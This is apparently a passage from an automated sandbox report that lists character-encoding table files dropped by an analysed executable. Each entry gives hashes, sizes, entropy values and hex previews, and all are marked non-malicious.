                                                                                                                                                                                                                              SSDEEP:768:R/RPrUHiJrKWkyY/W2wHiwWnwWOORY+gutSY83+JRS:RVUidzJCurDGSYvW
                                                                                                                                                                                                                              MD5:EF4508C84A025095B183E6BAD67B1ECD
                                                                                                                                                                                                                              SHA1:D12D5381D50D578AA8687671DC542C462A7F490D
                                                                                                                                                                                                                              SHA-256:6D1B512110BEAF2CD1296AC878F51D567848AB4A1CED4F18C72806BB136B3D23
                                                                                                                                                                                                                              SHA-512:E695E7E6F4A11D5E8D62982E26B69B87DB2F1F3D6B6DCCD5F1DF51879F5C4533265CBD7B785E1F2652D8CA3FC913D4F862E7575F67C636314A6E6956FD96E023
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp932, multi-byte..M..003F 0 46..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080000000000000000000850086000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000FF61FF62FF63FF64FF65FF66FF67FF68FF69FF6AFF6BFF6CFF6DFF6EFF6F..FF70FF71FF72FF73FF74FF75FF76FF77FF78FF79FF7AFF7BFF7CFF7DFF7EFF7F..FF80FF81FF82FF83FF84FF85FF86FF87FF88FF89FF8AFF8BFF8CFF8DFF8EFF8F..FF90FF91FF92FF93FF94FF95FF96FF97FF98FF99FF9AFF9BFF9CFF9DFF9EFF9F..0000000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):134671
                                                                                                                                                                                                                              Entropy (8bit):3.5217328918779645
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:+CwDua7D90Jz1aDJmnMfEGniOQdH6prJs3inqlW6/t9Qwf+zCt5:j1WVRpe3rpt9hf+Gt5
                                                                                                                                                                                                                              MD5:CF9CFD6329A4FB6C402052B9417DAC3A
                                                                                                                                                                                                                              SHA1:75CE13FE1E5898D47B67F951C0C228851F1CC04D
                                                                                                                                                                                                                              SHA-256:B6EC2BE0504CA62B9D1B6857F6BAA13FFAC5A567D4432F4EAB98ADC830F5D9C3
                                                                                                                                                                                                                              SHA-512:7E19607EEA5342ECFE92D56DAAE82827DE147AE5AFDA8E9D67FD0970F528902CDE20A8A07CF2F341B926E59BB4FF792872976F1C7C5CD351959A71A8B6A1924A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp936, multi-byte..M..003F 0 127..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):132551
                                                                                                                                                                                                                              Entropy (8bit):3.100976362851161
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:2UO8ecy5KnSMsDlOmNpkQ4oQHnTApv+ngLbiyEY:2U/etc/sBRZp//r
                                                                                                                                                                                                                              MD5:03E19A4DE3490A7DC50D04EC1F558835
                                                                                                                                                                                                                              SHA1:9DFECAE08C98109EAA358F5920AED647888F722B
                                                                                                                                                                                                                              SHA-256:477F8B79B67F4A22C963EE65B9B387DBD8E4B8F62D800B0A51D2276580C6ADBB
                                                                                                                                                                                                                              SHA-512:7D6AD30AF75A3AA6332A860C6ABF87BF725EB6B4AF3B37699043A10EF3235471C63D0ECB4D437D5AD9438DF5DA646EB55117A9BB8B55EF6868F71E49035C18B7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp949, multi-byte..M..003F 0 125..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):93330
                                                                                                                                                                                                                              Entropy (8bit):3.319807723045599
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:aAHU3LIkZlmXrd/uQ0ao98ggKSTEvZPHb6qRL5NpiadDp0ZBFR6YR/fW:aVduBGf9PgFMT6q95GDRBfW
                                                                                                                                                                                                                              MD5:1D84B025DAB127F2073947D764D307B6
                                                                                                                                                                                                                              SHA1:4E3D3CBD96D084836F1FE6F2AA497E3FAA463B9B
                                                                                                                                                                                                                              SHA-256:F80E05533D1A1494C32F9412E9AD2D9C11FAF9AE0668A6F9D1FA5CEEDC6870E2
                                                                                                                                                                                                                              SHA-512:188D649F9717F20524AFF47F85C3B23AEC3E7825BF54975285D06C17587D581DC24A3F6A7CAB1703DE7AD5521FE2FE2572DE627A81E6A48049A47BB219ED4AF8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp950, multi-byte..M..003F 0 88..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1113
                                                                                                                                                                                                                              Entropy (8bit):3.7780987266961663
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:vJMHkUlJvRjmf9RCsUBOdXsCbbNviANpk3m1XFAoE4xSF5HrBPkdn:vKvlA9RCs6CXrViAN51XFA9eSvdPKn
                                                                                                                                                                                                                              MD5:90FE0C57BBC6C2D8A3324DEB7FD45F3D
                                                                                                                                                                                                                              SHA1:06B95BE43E4C859A0F1B01384EDD26500C6C1F9E
                                                                                                                                                                                                                              SHA-256:EB9B262E4D179268E6F017C0D4EF0E7034E31A5B4893595D150640CA1F6A1C45
                                                                                                                                                                                                                              SHA-512:6A5E67D9F3EC6046C42793E1437B8A6E50EBD72D8EC67FEFEB6DAD6FAB6A5B5C74F939363587D5A6529E217AF54FB8A9CF0F768E114DD931C57887451CACE56E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: dingbats, single-byte..S..003F 1 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..00202701270227032704260E2706270727082709261B261E270C270D270E270F..2710271127122713271427152716271727182719271A271B271C271D271E271F..2720272127222723272427252726272726052729272A272B272C272D272E272F..2730273127322733273427352736273727382739273A273B273C273D273E273F..2740274127422743274427452746274727482749274A274B25CF274D25A0274F..27502751275225B225BC25C6275625D727582759275A275B275C275D275E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000276127622763276427652766276726632666266526602460246124622463..2464246524662467246824692776277727782779277A277B277C277D277E277F..2780278127822783278427852786278727882789278A278B278C278D278E278F..2790279127922793279421922194219527982799279A279B279C279D279E279F..27A027A127A227A327A
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1073
                                                                                                                                                                                                                              Entropy (8bit):3.0039861897954805
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:XXBcIhJZDgEoQkNCGz0Jyh9lZk3Vmd2QhZLXPiALV3d:dTcNCJEhfZk3Vzox/iqVN
                                                                                                                                                                                                                              MD5:F7B3771D43BDE6AFF897683BED2FE6AD
                                                                                                                                                                                                                              SHA1:E70C2C0902413536CB6163752D70F3AE4AF6A967
                                                                                                                                                                                                                              SHA-256:165BE658AB7D61FFC3DF1E2F1438C2F9FCEE6808A756316302157F44E6D3ACD7
                                                                                                                                                                                                                              SHA-512:F87DC718EB2DD95237B144FDA090BB636121B9479E492AC94E4F7EBDD88171F070B9E9F6165BDA7B7E2BA2A3E6188B1108D8F91AA5F142CCCFDAD317628DD941
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:S..006F 0 1..00..0000000100020003008500090086007F0087008D008E000B000C000D000E000F..0010001100120013008F000A0008009700180019009C009D001C001D001E001F..0080008100820083008400920017001B00880089008A008B008C000500060007..0090009100160093009400950096000400980099009A009B00140015009E001A..002000A000E200E400E000E100E300E500E700F10060002E003C0028002B007C..002600E900EA00EB00E800ED00EE00EF00EC00DF00210024002A0029003B009F..002D002F00C200C400C000C100C300C500C700D1005E002C0025005F003E003F..00F800C900CA00CB00C800CD00CE00CF00CC00A8003A002300400027003D0022..00D800610062006300640065006600670068006900AB00BB00F000FD00FE00B1..00B0006A006B006C006D006E006F00700071007200AA00BA00E600B800C600A4..00B500AF0073007400750076007700780079007A00A100BF00D000DD00DE00AE..00A200A300A500B700A900A700B600BC00BD00BE00AC005B005C005D00B400D7..00F900410042004300440045004600470048004900AD00F400F600F200F300F5..00A6004A004B004C004D004E004F00500051005200B900FB00FC00DB00FA00FF..00D900F70053005400550056005700580059005A00B200D400D600D200D
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):86971
                                                                                                                                                                                                                              Entropy (8bit):2.3925661740847697
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:UHivP+bFFScXEBFhHeUrUFESCeYjN7GC0nYX:I7FFX2nHeUr8ESCDlX
                                                                                                                                                                                                                              MD5:C5AA0D11439E0F7682DAE39445F5DAB4
                                                                                                                                                                                                                              SHA1:73A6D55B894E89A7D4CB1CD3CCFF82665C303D5C
                                                                                                                                                                                                                              SHA-256:1700AF47DC012A48CEC89CF1DFAE6D1D0D2F40ED731EFF6CA55296A055A11C00
                                                                                                                                                                                                                              SHA-512:EEE6058BD214C59BCC11E6DE7265DA2721C119CC9261CFD755A98E270FF74D2D73E3E711AA01A0E3414C46D82E291EF0DF2AD6C65CA477C888426D5A1D2A3BC5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: euc-cn, multi-byte..M..003F 0 82..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):83890
                                                                                                                                                                                                                              Entropy (8bit):2.350315390677456
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:2GhX8nuQ635vlHptHzh0abNQPQA0OMS2HhFV3:2GikvRpMuNQ4P73
                                                                                                                                                                                                                              MD5:F2DE0AE66A4E5DD51CC64B08D3709AAB
                                                                                                                                                                                                                              SHA1:97558A51A6DD6C56FC7A42A4204141A5639021FD
                                                                                                                                                                                                                              SHA-256:A3C916BA16BCAC9FAA5A1CCC62ACA61452D581CD8BA3EE07EC39122C697274C9
                                                                                                                                                                                                                              SHA-512:0EAA90100527FF150D2653D7BB57647D69E592BE53B714DDD867114CFCC71E3A76882772F4FAECE040DF09FA8971D1C22DECC497E589B4CA827A6890497A48D9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: euc-jp, multi-byte..M..003F 0 79..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D0000008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):95451
                                                                                                                                                                                                                              Entropy (8bit):2.4080588863614136
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:4/vO7UlClqAd8XfpUqv+mCoKRuLbtMjnIxz0DY:4nO4N9fpv+ngLbiyEY
                                                                                                                                                                                                                              MD5:103843B3A57168BD574F6CACC550D439
                                                                                                                                                                                                                              SHA1:982652EA2B0DCFBB55970E019A4EDFBFCFAF9C24
                                                                                                                                                                                                                              SHA-256:5448643398685456A11CBB93AF2321F70B8659E2FFF3CCC534B4D53BD2F38C89
                                                                                                                                                                                                                              SHA-512:27A8DE6F97DB4A96E5D0132692A32A99DAB8A6C98973A0C4E50A219F2D2F364E63D657E5E8478B2706CA33C45C376F55B5BFCC9459E06AEA88BFCD4F0E32525C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: euc-kr, multi-byte..M..003F 0 90..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):88033
                                                                                                                                                                                                                              Entropy (8bit):2.3790651802316996
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:o4Is/C+0IwpRK1CkinIKUyNiNBzxOC4T/:LIsR0/RKckiIgNiDtOxT
                                                                                                                                                                                                                              MD5:1A8E55DEA98B6D5EAC731ED233D3AD7C
                                                                                                                                                                                                                              SHA1:1335FC0FC2AAE7E7F5EC42AC17A4168368B4A64D
                                                                                                                                                                                                                              SHA-256:B4894AEDD2D5B5AE54B6D2840F7C89A88E9308EFD288F179E65936E172EF4B0D
                                                                                                                                                                                                                              SHA-512:9DDCE366BA1196EB9FB913ACFDE8516BC9BB8D51894866D2E7E8CB313DC4D6C6D33C5A9E78142E83594DC423D10DA6F8DE211E69844B939198BC7DB9AED808F0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: gb12345, double-byte..D..233F 0 83..21..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000030003001300230FB02C902C700A8300330052015FF5E2225202620182019..201C201D3014301530083009300A300B300C300D300E300F3016301730103011..00B100D700F72236222722282211220F222A222922082237221A22A522252220..23122299222B222E2261224C2248223D221D2260226E226F22642265221E2235..22342642264000B0203220332103FF0400A4FFE0FFE1203000A7211626062605..25CB25CF25CE25C725C625A125A025B325B2203B219221902191219330130000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1111
                                                                                                                                                                                                                              Entropy (8bit):3.270324851474969
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:qrmHVBUlJvRj76OVbusZhAMiZyi77qN8VmKfkiJt0RMFS:qSMlZVnrAMiwMmNPYPFS
                                                                                                                                                                                                                              MD5:D06664ACAA478BDEB42B63941109A4E3
                                                                                                                                                                                                                              SHA1:4A6196FCC1BDE988C1A23EAA69745A9979F1AEFF
                                                                                                                                                                                                                              SHA-256:ACD50951F81566C8D823670F9957B2479102EB5AE4CF558453E1D8436A9E31FF
                                                                                                                                                                                                                              SHA-512:CB51A36B851FFDB5C6F9B9D0333EEA6A14CEF3796E0A60530198C16999D64E638047E873333630360299C9126F79CEDDA2D9F169028CED1FC04B1D3C55FFFC5B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: gb1988, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..002000210022002300A500250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D203E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000FF61FF62FF63FF64FF65FF66FF67FF68FF69FF6AFF6BFF6CFF6DFF6EFF6F..FF70FF71FF72FF73FF74FF75FF76FF77FF78FF79FF7AFF7BFF7CFF7DFF7EFF7F..FF80FF81FF82FF83FF84FF85FF86FF87FF88FF89FF8AFF8BFF8CFF8DFF8EFF8F..FF90FF91FF92FF93FF94FF95FF96FF97FF98FF99FF9AFF9BFF9CFF9DFF9EFF9F..000000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):85912
                                                                                                                                                                                                                              Entropy (8bit):2.3945751552930936
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:D47/S+i8vdx3Tz+hpHcBrQqKtrebjMIGCx8jE:0c873T6DHcBrbKtrVlE
                                                                                                                                                                                                                              MD5:9357E05C74D6A124825F46A42B280C14
                                                                                                                                                                                                                              SHA1:E5106ABE12D991AFE514F41E3B9E239202A4ADFE
                                                                                                                                                                                                                              SHA-256:C445E4C9F676AE997D2DDA2BBC107B746F3547D85F39479951C56F46275EE355
                                                                                                                                                                                                                              SHA-512:B2187D70A92FB38572BA46F3C3443233BEED1A4ABBFBA1B860F4BBAE6B3D8C16B8C9F52A20DAA12B2B8B40972E52F816860427B743530177E4CF0D8BA34EF381
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: gb2312, double-byte..D..233F 0 81..21..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000030003001300230FB02C902C700A8300330052015FF5E2225202620182019..201C201D3014301530083009300A300B300C300D300E300F3016301730103011..00B100D700F72236222722282211220F222A222922082237221A22A522252220..23122299222B222E2261224C2248223D221D2260226E226F22642265221E2235..22342642264000B0203220332103FF0400A4FFE0FFE1203000A7211626062605..25CB25CF25CE25C725C625A125A025B325B2203B219221902191219330130000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):86971
                                                                                                                                                                                                                              Entropy (8bit):2.3925661740847697
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:UHivP+bFFScXEBFhHeUrUFESCeYjN7GC0nYX:I7FFX2nHeUr8ESCDlX
                                                                                                                                                                                                                              MD5:C5AA0D11439E0F7682DAE39445F5DAB4
                                                                                                                                                                                                                              SHA1:73A6D55B894E89A7D4CB1CD3CCFF82665C303D5C
                                                                                                                                                                                                                              SHA-256:1700AF47DC012A48CEC89CF1DFAE6D1D0D2F40ED731EFF6CA55296A055A11C00
                                                                                                                                                                                                                              SHA-512:EEE6058BD214C59BCC11E6DE7265DA2721C119CC9261CFD755A98E270FF74D2D73E3E711AA01A0E3414C46D82E291EF0DF2AD6C65CA477C888426D5A1D2A3BC5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: euc-cn, multi-byte..M..003F 0 82..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):204
                                                                                                                                                                                                                              Entropy (8bit):4.949409835601965
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SOd5MNXVSVLqRIBXS4ovLE9sDXMVyXK9ow1Deq9Ts5dRPMSXcRA0kcR4X9cL+TXI:SVNFS0oyisLMsXK9okTw/BDSVKNw
                                                                                                                                                                                                                              MD5:D3AC33390D31705FA4486D0B455247DF
                                                                                                                                                                                                                              SHA1:2EE8613DC04A6FA84AB38FD5F3A2AA3FE330625B
                                                                                                                                                                                                                              SHA-256:98074C85650A420A095ADA9138DA3A8A0AA4027BE47EA1E97A596F319EB084E9
                                                                                                                                                                                                                              SHA-512:CB265B753C84968E2D1D6E706906DA9A7BB796D08F626290BCCA8F089771AFD176A9DC912773E8BA390D2AEC08592AD535C7D254E1DF92CF04848601481D4EFE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: iso2022-jp, escape-driven..E..name..iso2022-jp..init..{}..final..{}..ascii..\x1b(B..jis0201..\x1b(J..jis0208..\x1b$B..jis0208..\x1b$@..jis0212..\x1b$(D..gb2312..\x1b$A..ksc5601..\x1b$(C..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):122
                                                                                                                                                                                                                              Entropy (8bit):4.978693690727393
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SOd5MNXVTEXIBXS4ovLE9sDXNvdwUHEQwqc6XWxVUNOov:SVNFSoyisL/Zzc6mYNHv
                                                                                                                                                                                                                              MD5:057CB0AA9872AC3910184F67AC6621BC
                                                                                                                                                                                                                              SHA1:BBA47F9D76B6690C282724C3423BD94E2C320A04
                                                                                                                                                                                                                              SHA-256:234811FC8B0F8FF2B847D9CC3982F1699DF1D21A43C74DCE45BA855D22520007
                                                                                                                                                                                                                              SHA-512:019F187D2D16FB51BF627ACB7E67778857E56D4C160E0E5ACA6ABC05EC5FDB624CE2715CB9E0DAD73BFF9D697982BE0D539BC55BCCD368FC7C8EE0FFC04E9F61
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: iso2022-kr, escape-driven..E..name..iso2022-kr..init..\x1b$)C..final..{}..iso8859-1.\x0f..ksc5601..\x0e..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):240
                                                                                                                                                                                                                              Entropy (8bit):4.95909788984399
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SVNFUXoyisLNcs9ozc6W4Twk0sRBDSVKN6tWIHRy:oUYcLNcTzczbwRYRy
